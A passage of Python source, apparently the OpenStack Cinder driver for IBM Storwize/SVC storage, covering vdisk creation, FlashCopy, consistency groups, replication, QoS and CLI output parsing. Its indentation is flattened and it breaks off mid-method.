'also be set (not equal to -1).'))
if opts['iogrp'] not in state['available_iogrps']:
avail_grps = ''.join(str(e) for e in state['available_iogrps'])
raise exception.InvalidInput(
reason=_('I/O group %(iogrp)d is not valid; available '
'I/O groups are %(avail)s.')
% {'iogrp': opts['iogrp'],
'avail': avail_grps})
if opts['nofmtdisk'] and opts['rsize'] != -1:
raise exception.InvalidInput(
reason=_('If nofmtdisk is set to True, rsize must '
'also be set to -1.'))
def _get_opts_from_specs(self, opts, specs):
qos = {}
for k, value in specs.items():
# Get the scope, if using scope format
key_split = k.split(':')
if len(key_split) == 1:
scope = None
key = key_split[0]
else:
scope = key_split[0]
key = key_split[1]
# We generally do not look at capabilities in the driver, but
# replication is a special case where the user asks for
# a volume to be replicated, and we want both the scheduler and
# the driver to act on the value.
if ((not scope or scope == 'capabilities') and
key == 'replication'):
scope = None
key = 'replication'
words = value.split()
if not (words and len(words) == 2 and words[0] == '<is>'):
LOG.error(_LE('Replication must be specified as '
'\'<is> True\' or \'<is> False\'.'))
del words[0]
value = words[0]
# Add the QoS.
if scope and scope == 'qos':
if key in self.svc_qos_keys.keys():
try:
type_fn = self.svc_qos_keys[key]['type']
value = type_fn(value)
qos[key] = value
except ValueError:
continue
# Any keys that the driver should look at should have the
# 'drivers' scope.
if scope and scope != 'drivers':
continue
if key in opts:
this_type = type(opts[key]).__name__
if this_type == 'int':
value = int(value)
elif this_type == 'bool':
value = strutils.bool_from_string(value)
opts[key] = value
if len(qos) != 0:
opts['qos'] = qos
return opts
def _get_qos_from_volume_metadata(self, volume_metadata):
"""Return the QoS information from the volume metadata."""
qos = {}
for i in volume_metadata:
k = i.get('key', None)
value = i.get('value', None)
key_split = k.split(':')
if len(key_split) == 1:
scope = None
key = key_split[0]
else:
scope = key_split[0]
key = key_split[1]
# Add the QoS.
if scope and scope == 'qos':
if key in self.svc_qos_keys.keys():
try:
type_fn = self.svc_qos_keys[key]['type']
value = type_fn(value)
qos[key] = value
except ValueError:
continue
return qos
def _wait_for_a_condition(self, testmethod, timeout=None,
interval=INTERVAL_1_SEC):
start_time = time.time()
if timeout is None:
timeout = DEFAULT_TIMEOUT
def _inner():
try:
testValue = testmethod()
except Exception as ex:
testValue = False
LOG.debug('Helper.'
'_wait_for_condition: %(method_name)s '
'execution failed for %(exception)s.',
{'method_name': testmethod.__name__,
'exception': ex.message})
if testValue:
raise loopingcall.LoopingCallDone()
if int(time.time()) - start_time > timeout:
msg = (_('CommandLineHelper._wait_for_condition: %s timeout.')
% testmethod.__name__)
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
timer = loopingcall.FixedIntervalLoopingCall(_inner)
timer.start(interval=interval).wait()
def get_vdisk_params(self, config, state, type_id,
volume_type=None, volume_metadata=None):
"""Return the parameters for creating the vdisk.
Takes volume type and defaults from config options into account.
"""
opts = self.build_default_opts(config)
ctxt = context.get_admin_context()
if volume_type is None and type_id is not None:
volume_type = volume_types.get_volume_type(ctxt, type_id)
if volume_type:
qos_specs_id = volume_type.get('qos_specs_id')
specs = dict(volume_type).get('extra_specs')
# NOTE(vhou): We prefer the qos_specs association
# and over-ride any existing
# extra-specs settings if present
if qos_specs_id is not None:
kvs = qos_specs.get_qos_specs(ctxt, qos_specs_id)['specs']
# Merge the qos_specs into extra_specs and qos_specs has higher
# priority than extra_specs if they have different values for
# the same key.
specs.update(kvs)
opts = self._get_opts_from_specs(opts, specs)
if (opts['qos'] is None and config.storwize_svc_allow_tenant_qos
and volume_metadata):
qos = self._get_qos_from_volume_metadata(volume_metadata)
if len(qos) != 0:
opts['qos'] = qos
self.check_vdisk_opts(state, opts)
return opts
@staticmethod
def _get_vdisk_create_params(opts):
easytier = 'on' if opts['easytier'] else 'off'
if opts['rsize'] == -1:
params = []
if opts['nofmtdisk']:
params.append('-nofmtdisk')
else:
params = ['-rsize', '%s%%' % str(opts['rsize']),
'-autoexpand', '-warning',
'%s%%' % str(opts['warning'])]
if not opts['autoexpand']:
params.remove('-autoexpand')
if opts['compression']:
params.append('-compressed')
else:
params.extend(['-grainsize', str(opts['grainsize'])])
params.extend(['-easytier', easytier])
return params
def create_vdisk(self, name, size, units, pool, opts):
LOG.debug('Enter: create_vdisk: vdisk %s.', name)
params = self._get_vdisk_create_params(opts)
self.ssh.mkvdisk(name, size, units, pool, opts, params)
LOG.debug('Leave: _create_vdisk: volume %s.', name)
def get_vdisk_attributes(self, vdisk):
attrs = self.ssh.lsvdisk(vdisk)
return attrs
def is_vdisk_defined(self, vdisk_name):
"""Check if vdisk is defined."""
attrs = self.get_vdisk_attributes(vdisk_name)
return attrs is not None
def find_vdisk_copy_id(self, vdisk, pool):
resp = self.ssh.lsvdiskcopy(vdisk)
for copy_id, mdisk_grp in resp.select('copy_id', 'mdisk_grp_name'):
if mdisk_grp == pool:
return copy_id
msg = _('Failed to find a vdisk copy in the expected pool.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
def get_vdisk_copy_attrs(self, vdisk, copy_id):
return self.ssh.lsvdiskcopy(vdisk, copy_id=copy_id)[0]
def get_vdisk_copies(self, vdisk):
copies = {'primary': None,
'secondary': None}
resp = self.ssh.lsvdiskcopy(vdisk)
for copy_id, status, sync, primary, mdisk_grp in (
resp.select('copy_id', 'status', 'sync',
'primary', 'mdisk_grp_name')):
copy = {'copy_id': copy_id,
'status': status,
'sync': sync,
'primary': primary,
'mdisk_grp_name': mdisk_grp,
'sync_progress': None}
if copy['sync'] != 'yes':
progress_info = self.ssh.lsvdisksyncprogress(vdisk, copy_id)
copy['sync_progress'] = progress_info['progress']
if copy['primary'] == 'yes':
copies['primary'] = copy
else:
copies['secondary'] = copy
return copies
def _prepare_fc_map(self, fc_map_id, timeout):
self.ssh.prestartfcmap(fc_map_id)
mapping_ready = False
wait_time = 5
max_retries = (timeout // wait_time) + 1
for try_number in range(1, max_retries):
mapping_attrs = self._get_flashcopy_mapping_attributes(fc_map_id)
if (mapping_attrs is None or
'status' not in mapping_attrs):
break
if mapping_attrs['status'] == 'prepared':
mapping_ready = True
break
elif mapping_attrs['status'] == 'stopped':
self.ssh.prestartfcmap(fc_map_id)
elif mapping_attrs['status'] != 'preparing':
msg = (_('Unexecpted mapping status %(status)s for mapping '
'%(id)s. Attributes: %(attr)s.')
% {'status': mapping_attrs['status'],
'id': fc_map_id,
'attr': mapping_attrs})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
greenthread.sleep(wait_time)
if not mapping_ready:
msg = (_('Mapping %(id)s prepare failed to complete within the'
'allotted %(to)d seconds timeout. Terminating.')
% {'id': fc_map_id,
'to': timeout})
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
def start_fc_consistgrp(self, fc_consistgrp):
self.ssh.startfcconsistgrp(fc_consistgrp)
def create_fc_consistgrp(self, fc_consistgrp):
self.ssh.mkfcconsistgrp(fc_consistgrp)
def delete_fc_consistgrp(self, fc_consistgrp):
self.ssh.rmfcconsistgrp(fc_consistgrp)
def stop_fc_consistgrp(self, fc_consistgrp):
self.ssh.stopfcconsistgrp(fc_consistgrp)
def run_consistgrp_snapshots(self, fc_consistgrp, snapshots, state,
config, timeout):
cgsnapshot = {'status': 'available'}
try:
for snapshot in snapshots:
opts = self.get_vdisk_params(config, state,
snapshot['volume_type_id'])
self.create_flashcopy_to_consistgrp(snapshot['volume_name'],
snapshot['name'],
fc_consistgrp,
config, opts)
snapshot['status'] = 'available'
self.prepare_fc_consistgrp(fc_consistgrp, timeout)
self.start_fc_consistgrp(fc_consistgrp)
# There is CG limitation that could not create more than 128 CGs.
# After start CG, we delete CG to avoid CG limitation.
# Cinder general will maintain the CG and snapshots relationship.
self.delete_fc_consistgrp(fc_consistgrp)
except exception.VolumeBackendAPIException as err:
for snapshot in snapshots:
snapshot['status'] = 'error'
cgsnapshot['status'] = 'error'
# Release cg
self.delete_fc_consistgrp(fc_consistgrp)
LOG.error(_LE("Failed to create CGSnapshot. "
"Exception: %s."), err)
return cgsnapshot, snapshots
def delete_consistgrp_snapshots(self, fc_consistgrp, snapshots):
"""Delete flashcopy maps and consistent group."""
cgsnapshot = {'status': 'available'}
try:
for snapshot in snapshots:
self.ssh.rmvdisk(snapshot['name'], True)
snapshot['status'] = 'deleted'
except exception.VolumeBackendAPIException as err:
for snapshot in snapshots:
snapshot['status'] = 'error_deleting'
cgsnapshot['status'] = 'error_deleting'
LOG.error(_LE("Failed to delete the snapshot %(snap)s of "
"CGSnapshot. Exception: %(exception)s."),
{'snap': snapshot['name'], 'exception': err})
return cgsnapshot, snapshots
def prepare_fc_consistgrp(self, fc_consistgrp, timeout):
"""Prepare FC Consistency Group."""
self.ssh.prestartfcconsistgrp(fc_consistgrp)
def prepare_fc_consistgrp_success():
mapping_ready = False
mapping_attrs = self._get_flashcopy_consistgrp_attr(fc_consistgrp)
if (mapping_attrs is None or
'status' not in mapping_attrs):
pass
if mapping_attrs['status'] == 'prepared':
mapping_ready = True
elif mapping_attrs['status'] == 'stopped':
self.ssh.prestartfcconsistgrp(fc_consistgrp)
elif mapping_attrs['status'] != 'preparing':
msg = (_('Unexpected mapping status %(status)s for mapping'
'%(id)s. Attributes: %(attr)s.') %
{'status': mapping_attrs['status'],
'id': fc_consistgrp,
'attr': mapping_attrs})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return mapping_ready
self._wait_for_a_condition(prepare_fc_consistgrp_success, timeout)
def create_cg_from_source(self, group, fc_consistgrp,
sources, targets, state,
config, timeout):
"""Create consistence group from source"""
LOG.debug('Enter: create_cg_from_source: cg %(cg)s'
' source %(source)s, target %(target)s',
{'cg': fc_consistgrp, 'source': sources, 'target': targets})
model_update = {'status': fields.ConsistencyGroupStatus.AVAILABLE}
ctxt = context.get_admin_context()
try:
for source, target in zip(sources, targets):
opts = self.get_vdisk_params(config, state,
source['volume_type_id'])
pool = utils.extract_host(target['host'], 'pool')
self.create_flashcopy_to_consistgrp(source['name'],
target['name'],
fc_consistgrp,
config, opts,
True, pool=pool)
self.prepare_fc_consistgrp(fc_consistgrp, timeout)
self.start_fc_consistgrp(fc_consistgrp)
self.delete_fc_consistgrp(fc_consistgrp)
volumes_model_update = self._get_volume_model_updates(
ctxt, targets, group['id'], model_update['status'])
except exception.VolumeBackendAPIException as err:
model_update['status'] = fields.ConsistencyGroupStatus.ERROR
volumes_model_update = self._get_volume_model_updates(
ctxt, targets, group['id'], model_update['status'])
with excutils.save_and_reraise_exception():
# Release cg
self.delete_fc_consistgrp(fc_consistgrp)
LOG.error(_LE("Failed to create CG from CGsnapshot. "
"Exception: %s"), err)
return model_update, volumes_model_update
LOG.debug('Leave: create_cg_from_source.')
return model_update, volumes_model_update
def _get_volume_model_updates(self, ctxt, volumes, cgId,
status='available'):
"""Update the volume model's status and return it."""
volume_model_updates = []
LOG.info(_LI(
"Updating status for CG: %(id)s."),
{'id': cgId})
if volumes:
for volume in volumes:
volume_model_updates.append({'id': volume['id'],
'status': status})
else:
LOG.info(_LI("No volume found for CG: %(cg)s."),
{'cg': cgId})
return volume_model_updates
def run_flashcopy(self, source, target, timeout, copy_rate,
full_copy=True):
"""Create a FlashCopy mapping from the source to the target."""
LOG.debug('Enter: run_flashcopy: execute FlashCopy from source '
'%(source)s to target %(target)s.',
{'source': source, 'target': target})
fc_map_id = self.ssh.mkfcmap(source, target, full_copy, copy_rate)
self._prepare_fc_map(fc_map_id, timeout)
self.ssh.startfcmap(fc_map_id)
LOG.debug('Leave: run_flashcopy: FlashCopy started from '
'%(source)s to %(target)s.',
{'source': source, 'target': target})
def create_flashcopy_to_consistgrp(self, source, target, consistgrp,
config, opts, full_copy=False,
pool=None):
"""Create a FlashCopy mapping and add to consistent group."""
LOG.debug('Enter: create_flashcopy_to_consistgrp: create FlashCopy'
' from source %(source)s to target %(target)s'
'Then add the flashcopy to %(cg)s.',
{'source': source, 'target': target, 'cg': consistgrp})
src_attrs = self.get_vdisk_attributes(source)
if src_attrs is None:
msg = (_('create_copy: Source vdisk %(src)s '
'does not exist.') % {'src': source})
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
src_size = src_attrs['capacity']
# In case we need to use a specific pool
if not pool:
pool = src_attrs['mdisk_grp_name']
self.create_vdisk(target, src_size, 'b', pool, opts)
self.ssh.mkfcmap(source, target, full_copy,
config.storwize_svc_flashcopy_rate,
consistgrp=consistgrp)
LOG.debug('Leave: create_flashcopy_to_consistgrp: '
'FlashCopy started from %(source)s to %(target)s.',
{'source': source, 'target': target})
def _get_vdisk_fc_mappings(self, vdisk):
"""Return FlashCopy mappings that this vdisk is associated with."""
mapping_ids = []
resp = self.ssh.lsvdiskfcmappings(vdisk)
for id in resp.select('id'):
mapping_ids.append(id)
return mapping_ids
def _get_flashcopy_mapping_attributes(self, fc_map_id):
resp = self.ssh.lsfcmap(fc_map_id)
if not len(resp):
return None
return resp[0]
def _get_flashcopy_consistgrp_attr(self, fc_map_id):
resp = self.ssh.lsfcconsistgrp(fc_map_id)
if not len(resp):
return None
return resp[0]
def _check_vdisk_fc_mappings(self, name, allow_snaps=True):
"""FlashCopy mapping check helper."""
LOG.debug('Loopcall: _check_vdisk_fc_mappings(), vdisk %s.', name)
mapping_ids = self._get_vdisk_fc_mappings(name)
wait_for_copy = False
for map_id in mapping_ids:
attrs = self._get_flashcopy_mapping_attributes(map_id)
if not attrs:
continue
source = attrs['source_vdisk_name']
target = attrs['target_vdisk_name']
copy_rate = attrs['copy_rate']
status = attrs['status']
if copy_rate == '0':
if source == name:
# Vdisk with snapshots. Return False if snapshot
# not allowed.
if not allow_snaps:
raise loopingcall.LoopingCallDone(retvalue=False)
self.ssh.chfcmap(map_id, copyrate='50', autodel='on')
wait_for_copy = True
else:
# A snapshot
if target != name:
msg = (_('Vdisk %(name)s not involved in '
'mapping %(src)s -> %(tgt)s.') %
{'name': name, 'src': source, 'tgt': target})
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
if status in ['copying', 'prepared']:
self.ssh.stopfcmap(map_id)
# Need to wait for the fcmap to change to
# stopped state before remove fcmap
wait_for_copy = True
elif status in ['stopping', 'preparing']:
wait_for_copy = True
else:
self.ssh.rmfcmap(map_id)
# Case 4: Copy in progress - wait and will autodelete
else:
if status == 'prepared':
self.ssh.stopfcmap(map_id)
self.ssh.rmfcmap(map_id)
elif status == 'idle_or_copied':
# Prepare failed
self.ssh.rmfcmap(map_id)
else:
wait_for_copy = True
if not wait_for_copy or not len(mapping_ids):
raise loopingcall.LoopingCallDone(retvalue=True)
def ensure_vdisk_no_fc_mappings(self, name, allow_snaps=True):
"""Ensure vdisk has no flashcopy mappings."""
timer = loopingcall.FixedIntervalLoopingCall(
self._check_vdisk_fc_mappings, name, allow_snaps)
# Create a timer greenthread. The default volume service heart
# beat is every 10 seconds. The flashcopy usually takes hours
# before it finishes. Don't set the sleep interval shorter
# than the heartbeat. Otherwise volume service heartbeat
# will not be serviced.
LOG.debug('Calling _ensure_vdisk_no_fc_mappings: vdisk %s.',
name)
ret = timer.start(interval=self.check_fcmapping_interval).wait()
timer.stop()
return ret
def start_relationship(self, volume_name, primary=None):
vol_attrs = self.get_vdisk_attributes(volume_name)
if vol_attrs['RC_name']:
self.ssh.startrcrelationship(vol_attrs['RC_name'], primary)
def stop_relationship(self, volume_name):
vol_attrs = self.get_vdisk_attributes(volume_name)
if vol_attrs['RC_name']:
self.ssh.stoprcrelationship(vol_attrs['RC_name'], access=True)
def create_relationship(self, master, aux, system, asyncmirror):
name = 'rcrel' + ''.join(random.sample(string.digits, 10))
try:
rc_id = self.ssh.mkrcrelationship(master, aux, system, name,
asyncmirror)
except exception.VolumeBackendAPIException as e:
# CMMVC5959E is the code in Stowize storage, meaning that
# there is a relationship that already has this name on the
# master cluster.
if 'CMMVC5959E' not in e:
# If there is no relation between the primary and the
# secondary back-end storage, the exception is raised.
raise
if rc_id:
self.start_relationship(master)
def delete_relationship(self, volume_name):
vol_attrs = self.get_vdisk_attributes(volume_name)
if vol_attrs['RC_name']:
self.ssh.stoprcrelationship(vol_attrs['RC_name'])
self.ssh.rmrcrelationship(vol_attrs['RC_name'])
vol_attrs = self.get_vdisk_attributes(volume_name)
def get_relationship_info(self, volume):
vol_attrs = self.get_vdisk_attributes(volume['name'])
if not vol_attrs or not vol_attrs['RC_name']:
LOG.info(_LI("Unable to get remote copy information for "
"volume %s"), volume['name'])
return
relationship = self.ssh.lsrcrelationship(vol_attrs['RC_name'])
return relationship[0] if len(relationship) > 0 else None
def switch_relationship(self, relationship, aux=True):
self.ssh.switchrelationship(relationship, aux)
def get_partnership_info(self, system_name):
partnership = self.ssh.lspartnership(system_name)
return partnership[0] if len(partnership) > 0 else None
def get_partnershipcandidate_info(self, system_name):
candidates = self.ssh.lspartnershipcandidate()
for candidate in candidates:
if system_name == candidate['name']:
return candidate
return None
def mkippartnership(self, ip_v4, bandwith=1000):
self.ssh.mkippartnership(ip_v4, bandwith)
def mkfcpartnership(self, system_name, bandwith=1000):
self.ssh.mkfcpartnership(system_name, bandwith)
def startpartnership(self, partnership_id):
self.ssh.startpartnership(partnership_id)
def delete_vdisk(self, vdisk, force):
"""Ensures that vdisk is not part of FC mapping and deletes it."""
LOG.debug('Enter: delete_vdisk: vdisk %s.', vdisk)
if not self.is_vdisk_defined(vdisk):
LOG.info(_LI('Tried to delete non-existent vdisk %s.'), vdisk)
return
self.ensure_vdisk_no_fc_mappings(vdisk)
self.ssh.rmvdisk(vdisk, force=force)
LOG.debug('Leave: delete_vdisk: vdisk %s.', vdisk)
def create_copy(self, src, tgt, src_id, config, opts,
full_copy, pool=None):
"""Create a new snapshot using FlashCopy."""
LOG.debug('Enter: create_copy: snapshot %(src)s to %(tgt)s.',
{'tgt': tgt, 'src': src})
src_attrs = self.get_vdisk_attributes(src)
if src_attrs is None:
msg = (_('create_copy: Source vdisk %(src)s (%(src_id)s) '
'does not exist.') % {'src': src, 'src_id': src_id})
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
src_size = src_attrs['capacity']
# In case we need to use a specific pool
if not pool:
pool = src_attrs['mdisk_grp_name']
self.create_vdisk(tgt, src_size, 'b', pool, opts)
timeout = config.storwize_svc_flashcopy_timeout
try:
self.run_flashcopy(src, tgt, timeout,
config.storwize_svc_flashcopy_rate,
full_copy=full_copy)
except Exception:
with excutils.save_and_reraise_exception():
self.delete_vdisk(tgt, True)
LOG.debug('Leave: _create_copy: snapshot %(tgt)s from '
'vdisk %(src)s.',
{'tgt': tgt, 'src': src})
def extend_vdisk(self, vdisk, amount):
self.ssh.expandvdisksize(vdisk, amount)
def add_vdisk_copy(self, vdisk, dest_pool, volume_type, state, config):
"""Add a vdisk copy in the given pool."""
resp = self.ssh.lsvdiskcopy(vdisk)
if len(resp) > 1:
msg = (_('add_vdisk_copy failed: A copy of volume %s exists. '
'Adding another copy would exceed the limit of '
'2 copies.') % vdisk)
raise exception.VolumeDriverException(message=msg)
orig_copy_id = resp[0].get("copy_id", None)
if orig_copy_id is None:
msg = (_('add_vdisk_copy started without a vdisk copy in the '
'expected pool.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
if volume_type is None:
opts = self.get_vdisk_params(config, state, None)
else:
opts = self.get_vdisk_params(config, state, volume_type['id'],
volume_type=volume_type)
params = self._get_vdisk_create_params(opts)
new_copy_id = self.ssh.addvdiskcopy(vdisk, dest_pool, params)
return (orig_copy_id, new_copy_id)
def is_vdisk_copy_synced(self, vdisk, copy_id):
sync = self.ssh.lsvdiskcopy(vdisk, copy_id=copy_id)[0]['sync']
if sync == 'yes':
return True
return False
def rm_vdisk_copy(self, vdisk, copy_id):
self.ssh.rmvdiskcopy(vdisk, copy_id)
@staticmethod
def can_migrate_to_host(host, state):
if 'location_info' not in host['capabilities']:
return None
info = host['capabilities']['location_info']
try:
(dest_type, dest_id, dest_pool) = info.split(':')
except ValueError:
return None
if (dest_type != 'StorwizeSVCDriver' or dest_id != state['system_id']):
return None
return dest_pool
def add_vdisk_qos(self, vdisk, qos):
"""Add the QoS configuration to the volume."""
for key, value in qos.items():
if key in self.svc_qos_keys.keys():
param = self.svc_qos_keys[key]['param']
self.ssh.chvdisk(vdisk, ['-' + param, str(value)])
def update_vdisk_qos(self, vdisk, qos):
"""Update all the QoS in terms of a key and value.
svc_qos_keys saves all the supported QoS parameters. Going through
this dict, we set the new values to all the parameters. If QoS is
available in the QoS configuration, the value is taken from it;
if not, the value will be set to default.
"""
for key, value in self.svc_qos_keys.items():
param = value['param']
if key in qos.keys():
# If the value is set in QoS, take the value from
# the QoS configuration.
v = qos[key]
else:
# If not, set the value to default.
v = value['default']
self.ssh.chvdisk(vdisk, ['-' + param, str(v)])
def disable_vdisk_qos(self, vdisk, qos):
"""Disable the QoS."""
for key, value in qos.items():
if key in self.svc_qos_keys.keys():
param = self.svc_qos_keys[key]['param']
# Take the default value.
value = self.svc_qos_keys[key]['default']
self.ssh.chvdisk(vdisk, ['-' + param, value])
def change_vdisk_options(self, vdisk, changes, opts, state):
if 'warning' in opts:
opts['warning'] = '%s%%' % str(opts['warning'])
if 'easytier' in opts:
opts['easytier'] = 'on' if opts['easytier'] else 'off'
if 'autoexpand' in opts:
opts['autoexpand'] = 'on' if opts['autoexpand'] else 'off'
for key in changes:
self.ssh.chvdisk(vdisk, ['-' + key, opts[key]])
def change_vdisk_iogrp(self, vdisk, state, iogrp):
if state['code_level'] < (6, 4, 0, 0):
LOG.debug('Ignore change IO group as storage code level is '
'%(code_level)s, below the required 6.4.0.0.',
{'code_level': state['code_level']})
else:
self.ssh.movevdisk(vdisk, str(iogrp[0]))
self.ssh.addvdiskaccess(vdisk, str(iogrp[0]))
self.ssh.rmvdiskaccess(vdisk, str(iogrp[1]))
def vdisk_by_uid(self, vdisk_uid):
"""Returns the properties of the vdisk with the specified UID.
Returns None if no such disk exists.
"""
vdisks = self.ssh.lsvdisks_from_filter('vdisk_UID', vdisk_uid)
if len(vdisks) == 0:
return None
if len(vdisks) != 1:
msg = (_('Expected single vdisk returned from lsvdisk when '
'filtering on vdisk_UID. %(count)s were returned.') %
{'count': len(vdisks)})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
vdisk = vdisks.result[0]
return self.ssh.lsvdisk(vdisk['name'])
def is_vdisk_in_use(self, vdisk):
"""Returns True if the specified vdisk is mapped to at least 1 host."""
resp = self.ssh.lsvdiskhostmap(vdisk)
return len(resp) != 0
def rename_vdisk(self, vdisk, new_name):
self.ssh.chvdisk(vdisk, ['-name', new_name])
def change_vdisk_primary_copy(self, vdisk, copy_id):
self.ssh.chvdisk(vdisk, ['-primary', copy_id])
class CLIResponse(object):
"""Parse SVC CLI output and generate iterable."""
def __init__(self, raw, ssh_cmd=None, delim='!', with_header=True):
super(CLIResponse, self).__init__()
if ssh_cmd:
self.ssh_cmd = ' '.join(ssh_cmd)
else:
self.ssh_cmd = 'None'
self.raw = raw
self.delim = delim
self.with_header = with_header
self.result = self._parse()
def select(self, *keys):
for a in self.result:
vs = []
for k in keys:
v = a.get(k, None)
if isinstance(v, six.string_types) or v is None:
v = [v]
if isinstance(v, list):
vs.append(v)
for item in zip(*vs):
if len(item) == 1:
yield item[0]
else:
yield item
def __getitem__(self, key):
try:
return self.result[key]
except KeyError:
msg = (_('Did not find the expected key %(key)s in %(fun)s: '
'%(raw)s.') % {'key': key, 'fun': self.ssh_cmd,
'raw': self.raw})
raise exception.VolumeBackendAPIException(data=msg)
def __iter__(self):
for a in self.result:
yield a
def __len__(self):
return len(self.result)
def _parse(self):
def get_reader(content, delim):
for line in content.lstrip().splitlines():
line = line.strip()
if line:
yield line.split(delim)
else:
yield []
if isinstance(self.raw, six.string_types):
stdout, stderr = self.raw, ''
else:
stdout, stderr = self.raw
reader = get_reader(stdout, self.delim)
result = []
if self.with_header:
hds = tuple()
for row in reader:
hds = row
break
for row in reader:
cur = dict()
if len(hds) != len(row):
msg = (_('Unexpected CLI response: header/row mismatch. '
'header: %(header)s, row: %(row)s.')
% {'header': hds,
'row': row})
raise exception.VolumeBackendAPIException(data=msg)
for k, v in zip(hds, row):
CLIResponse.append_dict(cur, k, v)
result.append(cur)
else:
cur = dict()
for row in reader:
if row:
CLIResponse.append_dict(cur, row[0], ' '.join(row[1:]))
elif cur: # start new section
result.append(cur)
cur = dict()
if cur:
result.append(cur)
return result
@staticmethod
def append_dict(dict_, key, value):
key, value = key.strip(), value.strip()
obj = dict_.get(key, None)
if obj is None:
dict_[key] = value
elif isinstance(obj, list):
obj.append(value)
dict_[key] = obj
else:
dict_[key] = [obj, value]
return dict_
class StorwizeSVCCommonDriver(san.SanDriver,
driver.ManageableVD,
driver.ExtendVD, driver.SnapshotVD,
driver.MigrateVD, driver.ReplicaVD,
driver.ConsistencyGroupVD,
driver.CloneableImageVD,
driver.TransferVD):
"""IBM Storwize V7000 SVC abstract base class for iSCSI/FC volume drivers.
Version history:
1.0 - Initial driver
1.1 - FC support, create_cloned_volume, volume type support,
get_volume_stats, minor bug fixes
1.2.0 - Added retype
1.2.1 - Code refactor, improved exception handling
1.2.2 - Fix bug #1274123 (races in host-related functions)
1.2.3 - Fix Fibre Channel connectivity: bug #1279758 (add delim to
lsfabric, clear unused data from connections, ensure matching
WWPNs by comparing lower case
1.2.4 - Fix bug #1278035 (async migration/retype)
1.2.5 - Added support for manage_existing (unmanage is inherited)
1.2.6 - Added QoS support in terms of I/O throttling rate
1.3.1 - Added support for volume replication
1.3.2 - Added support for consistency group
1.3.3 - Update driver to use ABC metaclasses
2.0 - Code refactor, split init file and placed shared methods for
FC and iSCSI within the StorwizeSVCCommonDriver class
2.1 - Added replication V2 support to the global/metro mirror
mode
2.1.1 - Update replication to version 2.1
"""
VERSION = "2.1.1"
VDISKCOPYOPS_INTERVAL = 600
GLOBAL = 'global'
METRO = 'metro'
VALID_REP_TYPES = (GLOBAL, METRO)
FAILBACK_VALUE = 'default'
def __init__(self, *args, **kwargs):
super(StorwizeSVCCommonDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(storwize_svc_opts)
self._backend_name = self.configuration.safe_get('volume_backend_name')
self._helpers = StorwizeHelpers(self._run_ssh)
self._vdiskcopyops = {}
self._vdiskcopyops_loop = None
self.protocol = None
self.replication = None
self._state = {'storage_nodes': {},
'enabled_protocols': set(),
'compression_enabled': False,
'available_iogrps': [],
'system_name': None,
'system_id': None,
'code_level': None,
}
self._active_backend_id = kwargs.get('active_backend_id')
# Since there are three replication modes supported by Storwize,
# this dictionary is used to map the replication types to certain
# replications.
self.replications = {}
# One driver can be configured with multiple replication targets
# to failover.
self._replication_targets = []
# This boolean is used to indicate whether this driver is configured
# with replication.
self._replication_enabled = False
# This list is used to save the supported replication modes.
self._supported_replication_types = []
# Storwize has the limitation that can not burst more than 3 new ssh
# connections within 1 second. So slow down the initialization.
time.sleep(1)
def do_setup(self, ctxt):
"""Check that we have all configuration details from the storage."""
LOG.debug('enter: do_setup')
# Get storage system name, id, and code level
self._state.update(self._helpers.get_system_info())
# Get the replication helpers
self.replication = storwize_rep.StorwizeSVCReplication.factory(self)
# Validate that the pool exists
self._validate_pools_exist()
# Check if compression is supported
self._state['compression_enabled'] = (self._helpers.
compression_enabled())
# Get the available I/O groups
self._state['available_iogrps'] = (self._helpers.
get_available_io_groups())
# Get the iSCSI and FC names of the Storwize/SVC nodes
self._state['storage_nodes'] = self._helpers.get_node_info()
# Add the iSCSI IP addresses and WWPNs to the storage node info
self._helpers.add_iscsi_ip_addrs(self._state['storage_nodes'])
self._helpers.add_fc_wwpns(self._state['storage_nodes'])
# For each node, check what connection modes it supports. Delete any
# nodes that do not support any types (may be partially configured).
to_delete = []
for k, node in self._state['storage_nodes'].items():
if ((len(node['ipv4']) or len(node['ipv6']))
and len(node['iscsi_name'])):
node['enabled_protocols'].append('iSCSI')
self._state['enabled_protocols'].add('iSCSI')
if len(node['WWPN']):
node['enabled_protocols'].append('FC')
self._state['enabled_protocols'].add('FC')
if not len(node['enabled_protocols']):
to_delete.append(k)
for delkey in to_delete:
del self._state['storage_nodes'][delkey]
# Build the list of in-progress vdisk copy operations
if ctxt is None:
admin_context = context.get_admin_context()
else:
admin_context = ctxt.elevated()
volumes = self.db.volume_get_all_by_host(admin_context, self.host)
for volume in volumes:
metadata = self.db.volume_admin_metadata_get(admin_context,
volume['id'])
curr_ops = metadata.get('vdiskcopyops', None)
if curr_ops:
ops = [tuple(x.split(':')) for x in curr_ops.split(';')]
self._vdiskcopyops[volume['id']] = ops
# if vdiskcopy exists in database, start the looping call
if len(self._vdiskcopyops) >= 1:
self._vdiskcopyops_loop = loopingcall.FixedIntervalLoopingCall(
self._check_volume_copy_ops)
self._vdiskcopyops_loop.start(interval=self.VDISKCOPYOPS_INTERVAL)
LOG.debug('leave: do_setup')
# v2 replication setup
self._do_replication_setup()
def _validate_pools_exist(self):
# Validate that the pool exists
pools = self.configuration.storwize_svc_volpool_name
for pool in pools:
try:
self._helpers.get_pool_attrs(pool)
except exception.VolumeBackendAPIException:
msg = _('Failed getting details for pool %s.') % pool
raise exception.InvalidInput(reason=msg)
def check_for_setup_error(self):
"""Ensure that the flags are set properly."""
LOG.debug('enter: check_for_setup_error')
# Check that we have the system ID information
if self._state['system_name'] is None:
exception_msg = (_('Unable to determine system name.'))
raise exception.VolumeBackendAPIException(data=exception_msg)
if self._state['system_id'] is None:
exception_msg = (_('Unable to determine system id.'))
raise exception.VolumeBackendAPIException(data=exception_msg)
# Make sure we have at least one node configured
if not len(self._state['storage_nodes']):
msg = _('do_setup: No configured nodes.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
if self.protocol not in self._state['enabled_protocols']:
# TODO(mc_nair): improve this error message by looking at
# self._state['enabled_protocols'] to tell user what driver to use
